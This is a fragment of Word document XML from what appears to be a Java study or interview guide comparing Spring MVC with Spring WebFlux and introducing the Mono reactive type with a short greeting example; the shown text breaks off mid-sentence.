          <w:p w14:paraId="5A20858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 Netty, Undertow, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1DFC418F" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A02B2A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ncurrency Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248D697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thread per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6014EE0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 IO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="4CDCDA7A" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716BDB9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turn Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51D35A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delAndView, ResponseEntity, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3455710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 Flux&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="6A427557" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB64D1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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB946B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t ideal for high concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21DB045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ly scalable for concurrent connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="3D9C3CFF" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="129C6E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se Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="164769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web apps, CRUD apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CB101B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 apps, Streaming, Microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="68F81C73" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DDCE93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Backpressure Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EEBB00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2CC0C1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22F1BAED" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1168690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 Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D922F0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Template</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C23C2B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 (non-blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="7216BD13" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E9CE4C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erver Support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54014F2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Containers (Tomcat, Jetty)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51457E9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etty, Servlet 3.1+, Undertow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D6067A7"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786E8">
          <v:rect id="_x0000_i2213" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2675654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Each?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BB5F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MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – When working with traditional REST APIs or existing servlet-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4AFA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 When building high-performance, non-blocking apps like </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chat apps, real-time dashboards, IoT system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high-load microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5133A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214" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D536892" w14:textId="798C643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1" w:name="_Toc197867715"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the advantages of Spring WebFlux over traditional Spring MVC</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="501"/>
    </w:p>
    <w:p w14:paraId="2F058281" w14:textId="55A6D486"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 are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main advantages of Spring WebFlux over traditional Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C577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4D4F9">
          <v:rect id="_x0000_i2215" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="346487D0"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Non-blocking I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBAFBA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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses reactive, non-blocking I/O under the hood (Netty or Servlet 3.1+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1354E0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can handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thousands of concurrent connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with fewer resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32212E"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CB3111">
          <v:rect id="_x0000_i2216" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="302FBBA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Better Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F31B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high-concurrency apps like </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chat systems, streaming platforms, or IoT applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D63F65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event-loop model (like Node.js), which consumes less memory and CPU per request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEEBA9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6467F">
          <v:rect id="_x0000_i2217" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="677992F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Reactive Programming Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07F29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 xml:space="preserve">Fully supports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Publisher types</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like Mono and Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F22A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reat for composing asynchronous operations (e.g., chaining DB calls, API calls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525CF66F"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B5080">
          <v:rect id="_x0000_i2218" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5366DF42"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Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8FC62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Gracefully handles data overload by supporting </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which avoids memory overflows in high-load scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B0FA6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FC1A96">
          <v:rect id="_x0000_i2219" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A839C35"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Supports Functional Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260C861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addition to annotation-based controllers, WebFlux supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using lambda expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49808B9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94CF65">
          <v:rect id="_x0000_i2220" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="637860B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Client (Non-blocking HTTP client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C23618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places RestTemplate with WebClient, which is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and reactive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1460C34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4CE6">
          <v:rect id="_x0000_i2221" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30F2E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7. Cloud-Native &amp; Microservices Friendly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E28B6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orks great in </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cloud environments</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where scalability and reactive integration with DBs/APIs/message queues are essential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A3326"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41375">
          <v:rect id="_x0000_i2222" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03591F1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00"/>
        <w:gridCol w:w="2212"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1DF891A9" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D0A402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5D4BAB4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3AF6827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7364B8A1" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F8C63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O Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D983F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locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A9C12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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="495C1DBB" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A0BFE2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calability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3922468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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72F8AEF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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="76A7255D" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DED622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ackpressure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46DC50F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D1B981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6C6E5E1E" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05514DA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upport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B1CFD0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Limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4223A49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Full</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="1BE082F0" w14:textId="77777777" w:rsidTr="00454E0F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="611D8B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itable For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4573F4E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apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C866BC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reactive apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BA13DC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223" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC6718" w14:textId="5D05DC6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2" w:name="_Toc197867716"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Mono in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="502"/>
    </w:p>
    <w:p w14:paraId="0D0A4A41" w14:textId="16FF9D7F" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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a Mono&lt;T&gt; is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive type</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that represents </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a single (or no) value</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> emitted asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECF57BC"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BF4DE">
          <v:rect id="_x0000_i2224" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365A302"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at is Mono?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B6A26"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a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 the reactive library used by Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05943FA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lt;T&gt;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Reactive Streams API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23598E8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emits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBCB93D"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or One item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B32DA"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 or errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7A98E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DDBC91">
          <v:rect id="_x0000_i2225" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C49C41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Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F49A32"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your method returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single value</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC42F6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2531A632"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HTTP response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC182EF"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cknowledgement (e.g., save operation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C90290"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r even nothing (like Mono&lt;Void&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08740BFB"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7F14C">
          <v:rect id="_x0000_i2226" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC627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Basic Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5A579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greet")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DFB01F"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String&gt; greet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477474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Siddhant!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B1804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99369F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This sends "Hello, Siddhant!" as a </w:t>
